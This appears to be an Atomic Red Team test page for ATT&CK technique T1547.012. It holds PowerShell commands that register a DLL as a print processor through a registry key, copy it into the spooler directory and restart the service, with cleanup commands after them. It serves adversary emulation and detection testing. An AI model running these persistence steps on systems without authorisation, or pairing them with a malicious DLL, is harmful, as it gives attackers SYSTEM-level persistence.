Try it using Invoke-Atomic

Boot or Logon Autostart Execution: Print Processors

Description from ATT&CK

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

Atomic Tests

Atomic Test #1 - Print Processors

Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors. The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.

Note: The test assumes a x64 Windows operating system.

The payload source code is based on a blog post by stmxcsr: https://stmxcsr.com/persistence/print-processor.html

Supported Platforms: windows

auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0

Inputs:

Name Description Type Default Value
restart set to 1 if you want the computer to reboot as part of the test integer 0

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
7
8
9

if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
net stop spooler
Copy-Item "$PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll" C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
net start spooler
if(#{restart}){
  Restart-Computer
}

Cleanup Commands:

1
2
3
4
5
6

net stop spooler
rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
net start spooler

source